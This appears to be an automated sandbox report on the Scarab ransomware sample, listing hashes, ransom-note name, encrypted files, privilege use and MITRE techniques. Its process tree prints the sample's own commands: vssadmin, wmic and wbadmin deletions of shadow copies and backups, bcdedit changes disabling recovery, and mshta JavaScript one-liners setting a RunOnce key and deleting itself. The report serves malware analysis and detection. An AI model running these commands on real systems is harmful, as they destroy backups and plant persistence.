Overview
overview
10Static
static
32272954a2c...5a.exe
windows7-x64
102272954a2c...5a.exe
windows10-2004-x64
1072716d15ea...21.exe
windows7-x64
772716d15ea...21.exe
windows10-2004-x64
7Bit Paymer.exe
windows7-x64
10Bit Paymer.exe
windows10-2004-x64
10KeepCalm.exe
windows7-x64
1KeepCalm.exe
windows10-2004-x64
1LockedIn.exe
windows7-x64
9LockedIn.exe
windows10-2004-x64
9NotPetya.dll
windows7-x64
10NotPetya.dll
windows10-2004-x64
10Purge.exe
windows7-x64
1Purge.exe
windows10-2004-x64
1Scarab.exe
windows7-x64
10Scarab.exe
windows10-2004-x64
10a631ad1b1a...4b.exe
windows7-x64
6a631ad1b1a...4b.exe
windows10-2004-x64
6a9053a3a52...bc.exe
windows7-x64
7a9053a3a52...bc.exe
windows10-2004-x64
7b764629e1f...1c.exe
windows7-x64
10b764629e1f...1c.exe
windows10-2004-x64
10cf89f70633...5c.exe
windows7-x64
1cf89f70633...5c.exe
windows10-2004-x64
3e951e82867...50.exe
windows7-x64
1e951e82867...50.exe
windows10-2004-x64
1fa0c321e1a...d2.exe
windows7-x64
9fa0c321e1a...d2.exe
windows10-2004-x64
8fc184274ad...27.exe
windows7-x64
10fc184274ad...27.exe
windows10-2004-x64
10Resubmissions
18-07-2024 07:25
240718-h84wjs1hpb 1018-07-2024 07:19
240718-h51pqa1gng 1017-07-2024 20:55
240717-zqkhmaydmq 1017-07-2024 19:21
240717-x2pwdaycjb 10Analysis
-
max time kernel
150s -
max time network
129s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
17-07-2024 20:55
Static task
static1
Behavioral task
behavioral1
Sample
2272954a2c9f631b4f9c5f6d230287b0989ab3b512bb5f4a282214eadf42085a.exe
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
2272954a2c9f631b4f9c5f6d230287b0989ab3b512bb5f4a282214eadf42085a.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral3
Sample
72716d15ea7d118b8c99dbcb15114188abe468718c876ac52b0779161ef7e821.exe
Resource
win7-20240705-en
Behavioral task
behavioral4
Sample
72716d15ea7d118b8c99dbcb15114188abe468718c876ac52b0779161ef7e821.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral5
Sample
Bit Paymer.exe
Resource
win7-20240704-en
Behavioral task
behavioral6
Sample
Bit Paymer.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral7
Sample
KeepCalm.exe
Resource
win7-20240704-en
Behavioral task
behavioral8
Sample
KeepCalm.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral9
Sample
LockedIn.exe
Resource
win7-20240704-en
Behavioral task
behavioral10
Sample
LockedIn.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral11
Sample
NotPetya.dll
Resource
win7-20240708-en
Behavioral task
behavioral12
Sample
NotPetya.dll
Resource
win10v2004-20240709-en
Behavioral task
behavioral13
Sample
Purge.exe
Resource
win7-20240708-en
Behavioral task
behavioral14
Sample
Purge.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral15
Sample
Scarab.exe
Resource
win7-20240705-en
Behavioral task
behavioral16
Sample
Scarab.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral17
Sample
a631ad1b1a59001a5f594880c6ae3337bda98f8ce3bb46cd7a9de0b35cd2bc4b.exe
Resource
win7-20240704-en
Behavioral task
behavioral18
Sample
a631ad1b1a59001a5f594880c6ae3337bda98f8ce3bb46cd7a9de0b35cd2bc4b.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral19
Sample
a9053a3a52113698143a2b9801509c68d0d8b4b8208da453f0974547df0931bc.exe
Resource
win7-20240704-en
Behavioral task
behavioral20
Sample
a9053a3a52113698143a2b9801509c68d0d8b4b8208da453f0974547df0931bc.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral21
Sample
b764629e1f43851daf984c9372422b65ddceae28f83d6211873f4c8f8672c41c.exe
Resource
win7-20240705-en
Behavioral task
behavioral22
Sample
b764629e1f43851daf984c9372422b65ddceae28f83d6211873f4c8f8672c41c.exe
Resource
win10v2004-20240704-en
Behavioral task
behavioral23
Sample
cf89f70633865aa06123062a7dc51f8158905afb4b00f6f3597de3edfba97c5c.exe
Resource
win7-20240704-en
Behavioral task
behavioral24
Sample
cf89f70633865aa06123062a7dc51f8158905afb4b00f6f3597de3edfba97c5c.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral25
Sample
e951e82867a4f3af5a34b714571e9acf99cca794c4ed1895c9025a642d5d4350.exe
Resource
win7-20240705-en
Behavioral task
behavioral26
Sample
e951e82867a4f3af5a34b714571e9acf99cca794c4ed1895c9025a642d5d4350.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral27
Sample
fa0c321e1aad571daaa3bf642ced8ab10931a05957ce9f17da49317816ca50c7_WthaiV9ed2.exe
Resource
win7-20240704-en
Behavioral task
behavioral28
Sample
fa0c321e1aad571daaa3bf642ced8ab10931a05957ce9f17da49317816ca50c7_WthaiV9ed2.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral29
Sample
fc184274ad3908021e4c8ef28f35dc77447ed6457375d2a4e7b411955e042527.exe
Resource
win7-20240704-en
Behavioral task
behavioral30
Sample
fc184274ad3908021e4c8ef28f35dc77447ed6457375d2a4e7b411955e042527.exe
Resource
win10v2004-20240709-en
General
-
Target
Scarab.exe
-
Size
342KB
-
MD5
6899003aaa63ab4397f9e32e0a1daf43
-
SHA1
c22272ff0944d127992b393562871473b23ef8ea
-
SHA256
53f73dc2e8af9c059136029b3b535e885d4452d3375586eb9a0336d7a389aad5
-
SHA512
d8895f96e12d1b0b5907f7b1e7b976a37ff0cbe6db929cfbea5c931d905fb8269dc91bf44db83743920b63affc64ba88a0933d3111bc68f71ee266971b91b6bc
-
SSDEEP
6144:zmTLRf45/wAfqj6pjohSws+wZQtmk6LnAlnZ:eq5/tyjMLd+Rtmkc0
Malware Config
Extracted
C:\IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS.TXT
Signatures
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Renames multiple (234) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Deletes itself 1 IoCs
pid Process 2744 mshta.exe -
Executes dropped EXE 2 IoCs
pid Process 2720 sevnz.exe 2552 sevnz.exe -
Loads dropped DLL 2 IoCs
pid Process 2832 Scarab.exe 2832 Scarab.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2660163958-4080398480-1122754539-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\{45E73A27-D16C-4EDB-ADE8-0C069E54AF30} = "C:\\Users\\Admin\\AppData\\Roaming\\sevnz.exe" mshta.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 2492 set thread context of 2488 2492 Scarab.exe 30 PID 2704 set thread context of 2832 2704 Scarab.exe 34 PID 2720 set thread context of 2552 2720 sevnz.exe 39 -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\PPKLite.api.[[email protected]].scarab sevnz.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\VDK10.STD sevnz.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif.[[email protected]].scarab sevnz.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif.[[email protected]].scarab sevnz.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt.[[email protected]].scarab sevnz.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif.[[email protected]].scarab sevnz.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif sevnz.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat sevnz.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\EScript.api sevnz.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf sevnz.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif sevnz.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif.[[email protected]].scarab sevnz.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif sevnz.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS.TXT sevnz.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm.api sevnz.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Checkers.api.[[email protected]].scarab sevnz.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Spelling.api.[[email protected]].scarab sevnz.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif.[[email protected]].scarab sevnz.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SecStoreFile.ico sevnz.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT.[[email protected]].scarab sevnz.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\PDDom.api sevnz.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif.[[email protected]].scarab sevnz.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif.[[email protected]].scarab sevnz.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf.[[email protected]].scarab sevnz.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\FDFFile_8.ico sevnz.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat.[[email protected]].scarab sevnz.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT.[[email protected]].scarab sevnz.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc.[[email protected]].scarab sevnz.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif sevnz.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif sevnz.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif sevnz.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf.[[email protected]].scarab sevnz.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS.TXT sevnz.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif sevnz.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif.[[email protected]].scarab sevnz.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt sevnz.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif.[[email protected]].scarab sevnz.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf.[[email protected]].scarab sevnz.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt sevnz.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT sevnz.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\AcroRead.msi.[[email protected]].scarab sevnz.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT.[[email protected]].scarab sevnz.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer.[[email protected]].scarab sevnz.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif sevnz.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf.[[email protected]].scarab sevnz.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf sevnz.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT sevnz.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS.TXT sevnz.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der.[[email protected]].scarab sevnz.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif.[[email protected]].scarab sevnz.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif.[[email protected]].scarab sevnz.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS.TXT sevnz.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf sevnz.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif sevnz.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif sevnz.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt.[[email protected]].scarab sevnz.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT.[[email protected]].scarab sevnz.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annots.api.[[email protected]].scarab sevnz.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc sevnz.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm.[[email protected]].scarab sevnz.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT.[[email protected]].scarab sevnz.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT sevnz.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.STC.[[email protected]].scarab sevnz.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf sevnz.exe -
Access Token Manipulation: Create Process with Token 1 TTPs 2 IoCs
pid Process 2704 Scarab.exe 2832 Scarab.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2788 vssadmin.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2660163958-4080398480-1122754539-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-2660163958-4080398480-1122754539-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2552 sevnz.exe 2552 sevnz.exe 2552 sevnz.exe 2552 sevnz.exe 2552 sevnz.exe 2552 sevnz.exe 2552 sevnz.exe 2552 sevnz.exe 2552 sevnz.exe 2552 sevnz.exe 2552 sevnz.exe 2552 sevnz.exe 2552 sevnz.exe 2552 sevnz.exe 2552 sevnz.exe 2552 sevnz.exe 2552 sevnz.exe 2552 sevnz.exe 2552 sevnz.exe 2552 sevnz.exe 2552 sevnz.exe 2552 sevnz.exe 2552 sevnz.exe 2552 sevnz.exe 2552 sevnz.exe 2552 sevnz.exe 2552 sevnz.exe 2552 sevnz.exe 2552 sevnz.exe 2552 sevnz.exe 2552 sevnz.exe 2552 sevnz.exe 2552 sevnz.exe 2552 sevnz.exe 2552 sevnz.exe 2552 sevnz.exe 2552 sevnz.exe 2552 sevnz.exe 2552 sevnz.exe 2552 sevnz.exe 2552 sevnz.exe 2552 sevnz.exe 2552 sevnz.exe 2552 sevnz.exe 2552 sevnz.exe 2552 sevnz.exe 2552 sevnz.exe 2552 sevnz.exe 2552 sevnz.exe 2552 sevnz.exe 2552 sevnz.exe 2552 sevnz.exe 2552 sevnz.exe 2552 sevnz.exe 2552 sevnz.exe 2552 sevnz.exe 2552 sevnz.exe 2552 sevnz.exe 2552 sevnz.exe 2552 sevnz.exe 2552 sevnz.exe 2552 sevnz.exe 2552 sevnz.exe 2552 sevnz.exe -
Suspicious use of AdjustPrivilegeToken 43 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 2292 WMIC.exe Token: SeSecurityPrivilege 2292 WMIC.exe Token: SeTakeOwnershipPrivilege 2292 WMIC.exe Token: SeLoadDriverPrivilege 2292 WMIC.exe Token: SeSystemProfilePrivilege 2292 WMIC.exe Token: SeSystemtimePrivilege 2292 WMIC.exe Token: SeProfSingleProcessPrivilege 2292 WMIC.exe Token: SeIncBasePriorityPrivilege 2292 WMIC.exe Token: SeCreatePagefilePrivilege 2292 WMIC.exe Token: SeBackupPrivilege 2292 WMIC.exe Token: SeRestorePrivilege 2292 WMIC.exe Token: SeShutdownPrivilege 2292 WMIC.exe Token: SeDebugPrivilege 2292 WMIC.exe Token: SeSystemEnvironmentPrivilege 2292 WMIC.exe Token: SeRemoteShutdownPrivilege 2292 WMIC.exe Token: SeUndockPrivilege 2292 WMIC.exe Token: SeManageVolumePrivilege 2292 WMIC.exe Token: 33 2292 WMIC.exe Token: 34 2292 WMIC.exe Token: 35 2292 WMIC.exe Token: SeBackupPrivilege 2212 vssvc.exe Token: SeRestorePrivilege 2212 vssvc.exe Token: SeAuditPrivilege 2212 vssvc.exe Token: SeIncreaseQuotaPrivilege 2292 WMIC.exe Token: SeSecurityPrivilege 2292 WMIC.exe Token: SeTakeOwnershipPrivilege 2292 WMIC.exe Token: SeLoadDriverPrivilege 2292 WMIC.exe Token: SeSystemProfilePrivilege 2292 WMIC.exe Token: SeSystemtimePrivilege 2292 WMIC.exe Token: SeProfSingleProcessPrivilege 2292 WMIC.exe Token: SeIncBasePriorityPrivilege 2292 WMIC.exe Token: SeCreatePagefilePrivilege 2292 WMIC.exe Token: SeBackupPrivilege 2292 WMIC.exe Token: SeRestorePrivilege 2292 WMIC.exe Token: SeShutdownPrivilege 2292 WMIC.exe Token: SeDebugPrivilege 2292 WMIC.exe Token: SeSystemEnvironmentPrivilege 2292 WMIC.exe Token: SeRemoteShutdownPrivilege 2292 WMIC.exe Token: SeUndockPrivilege 2292 WMIC.exe Token: SeManageVolumePrivilege 2292 WMIC.exe Token: 33 2292 WMIC.exe Token: 34 2292 WMIC.exe Token: 35 2292 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2492 wrote to memory of 2488 2492 Scarab.exe 30 PID 2492 wrote to memory of 2488 2492 Scarab.exe 30 PID 2492 wrote to memory of 2488 2492 Scarab.exe 30 PID 2492 wrote to memory of 2488 2492 Scarab.exe 30 PID 2492 wrote to memory of 2488 2492 Scarab.exe 30 PID 2492 wrote to memory of 2488 2492 Scarab.exe 30 PID 2492 wrote to memory of 2488 2492 Scarab.exe 30 PID 2492 wrote to memory of 2488 2492 Scarab.exe 30 PID 2492 wrote to memory of 2488 2492 Scarab.exe 30 PID 2492 wrote to memory of 2488 2492 Scarab.exe 30 PID 2492 wrote to memory of 2488 2492 Scarab.exe 30 PID 2492 wrote to memory of 2488 2492 Scarab.exe 30 PID 2492 wrote to memory of 2488 2492 Scarab.exe 30 PID 2488 wrote to memory of 2740 2488 Scarab.exe 31 PID 2488 wrote to memory of 2740 2488 Scarab.exe 31 PID 2488 wrote to memory of 2740 2488 Scarab.exe 31 PID 2488 wrote to memory of 2740 2488 Scarab.exe 31 PID 2488 wrote to memory of 2704 2488 Scarab.exe 33 PID 2488 wrote to memory of 2704 2488 Scarab.exe 33 PID 2488 wrote to memory of 2704 2488 Scarab.exe 33 PID 2488 wrote to memory of 2704 2488 Scarab.exe 33 PID 2704 wrote to memory of 2832 2704 Scarab.exe 34 PID 2704 wrote to memory of 2832 2704 Scarab.exe 34 PID 2704 wrote to memory of 2832 2704 Scarab.exe 34 PID 2704 wrote to memory of 2832 2704 Scarab.exe 34 PID 2704 wrote to memory of 2832 2704 Scarab.exe 34 PID 2704 wrote to memory of 2832 2704 Scarab.exe 34 PID 2704 wrote to memory of 2832 2704 Scarab.exe 34 PID 2704 wrote to memory of 2832 2704 Scarab.exe 34 PID 2704 wrote to memory of 2832 2704 Scarab.exe 34 PID 2704 wrote to memory of 2832 2704 Scarab.exe 34 PID 2704 wrote to memory of 2832 2704 Scarab.exe 34 PID 2704 wrote to memory of 2832 2704 Scarab.exe 34 PID 2704 wrote to memory of 2832 2704 Scarab.exe 34 PID 2832 wrote to memory of 2888 2832 Scarab.exe 35 PID 2832 wrote to memory of 2888 2832 Scarab.exe 35 PID 2832 wrote to memory of 2888 2832 Scarab.exe 35 PID 2832 wrote to memory of 2888 2832 Scarab.exe 35 PID 2832 wrote to memory of 2720 2832 Scarab.exe 37 PID 2832 wrote to memory of 2720 2832 Scarab.exe 37 PID 2832 wrote to memory of 2720 2832 Scarab.exe 37 PID 2832 wrote to memory of 2720 2832 Scarab.exe 37 PID 2832 wrote to memory of 2744 2832 Scarab.exe 38 PID 2832 wrote to memory of 2744 2832 Scarab.exe 38 PID 2832 wrote to memory of 2744 2832 Scarab.exe 38 PID 2832 wrote to memory of 2744 2832 Scarab.exe 38 PID 2720 wrote to memory of 2552 2720 sevnz.exe 39 PID 2720 wrote to memory of 2552 2720 sevnz.exe 39 PID 2720 wrote to memory of 2552 2720 sevnz.exe 39 PID 2720 wrote to memory of 2552 2720 sevnz.exe 39 PID 2720 wrote to memory of 2552 2720 sevnz.exe 39 PID 2720 wrote to memory of 2552 2720 sevnz.exe 39 PID 2720 wrote to memory of 2552 2720 sevnz.exe 39 PID 2720 wrote to memory of 2552 2720 sevnz.exe 39 PID 2720 wrote to memory of 2552 2720 sevnz.exe 39 PID 2720 wrote to memory of 2552 2720 sevnz.exe 39 PID 2720 wrote to memory of 2552 2720 sevnz.exe 39 PID 2720 wrote to memory of 2552 2720 sevnz.exe 39 PID 2720 wrote to memory of 2552 2720 sevnz.exe 39 PID 2552 wrote to memory of 1992 2552 sevnz.exe 40 PID 2552 wrote to memory of 1992 2552 sevnz.exe 40 PID 2552 wrote to memory of 1992 2552 sevnz.exe 40 PID 2552 wrote to memory of 1992 2552 sevnz.exe 40 PID 2552 wrote to memory of 1612 2552 sevnz.exe 42 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\Scarab.exe"C:\Users\Admin\AppData\Local\Temp\Scarab.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2492 -
C:\Users\Admin\AppData\Local\Temp\Scarab.exe"C:\Users\Admin\AppData\Local\Temp\Scarab.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2488 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\Scarab.exe" "C:\Users\Admin\AppData\Roaming\sevnz.exe"3⤵PID:2740
-
-
C:\Users\Admin\AppData\Local\Temp\Scarab.exe"C:\Users\Admin\AppData\Local\Temp\Scarab.exe" runas3⤵
- Suspicious use of SetThreadContext
- Access Token Manipulation: Create Process with Token
- Suspicious use of WriteProcessMemory
PID:2704 -
C:\Users\Admin\AppData\Local\Temp\Scarab.exe"C:\Users\Admin\AppData\Local\Temp\Scarab.exe" runas4⤵
- Loads dropped DLL
- Access Token Manipulation: Create Process with Token
- Suspicious use of WriteProcessMemory
PID:2832 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\Scarab.exe" "C:\Users\Admin\AppData\Roaming\sevnz.exe"5⤵PID:2888
-
-
C:\Users\Admin\AppData\Roaming\sevnz.exe"C:\Users\Admin\AppData\Roaming\sevnz.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2720 -
C:\Users\Admin\AppData\Roaming\sevnz.exe"C:\Users\Admin\AppData\Roaming\sevnz.exe"6⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2552 -
C:\Windows\SysWOW64\mshta.exemshta.exe "javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('sevnz.exe').Path;o.RegWrite('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\{45E73A27-D16C-4EDB-ADE8-0C069E54AF30}',i);}catch(e){}},10);"7⤵
- Adds Run key to start application
- Modifies Internet Explorer settings
PID:1992
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:07⤵PID:1612
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic SHADOWCOPY DELETE7⤵PID:2036
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic SHADOWCOPY DELETE8⤵
- Suspicious use of AdjustPrivilegeToken
PID:2292
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /All /Quiet7⤵PID:1764
-
C:\Windows\SysWOW64\vssadmin.exevssadmin Delete Shadows /All /Quiet8⤵
- Interacts with shadow copies
PID:2788
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c bcdedit /set {default} recoveryenabled No7⤵PID:264
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures7⤵PID:696
-
-
-
-
C:\Windows\SysWOW64\mshta.exemshta.exe "javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('Scarab.exe');close()}catch(e){}},10);"5⤵
- Deletes itself
- Modifies Internet Explorer settings
PID:2744
-
-
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2212
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Access Token Manipulation
1Create Process with Token
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
MD5284eb16cc9c3372019abd1cca41c72a6
SHA1241ec1a024e7b99e912d6c4f589891270ad36ef4
SHA256c808bb9a7a306877c139f7125212c562c644b7b6314d831f30fdc12554b1de37
SHA5127623d45f6dcd1fc1e38a3c9017d679d097444cf690e812ccf57a28185a992a83acd8e50994af2b5236d05f372f2ff2ad7296256cdef0f871709f45e50169939d
-
Filesize
342KB
MD56899003aaa63ab4397f9e32e0a1daf43
SHA1c22272ff0944d127992b393562871473b23ef8ea
SHA25653f73dc2e8af9c059136029b3b535e885d4452d3375586eb9a0336d7a389aad5
SHA512d8895f96e12d1b0b5907f7b1e7b976a37ff0cbe6db929cfbea5c931d905fb8269dc91bf44db83743920b63affc64ba88a0933d3111bc68f71ee266971b91b6bc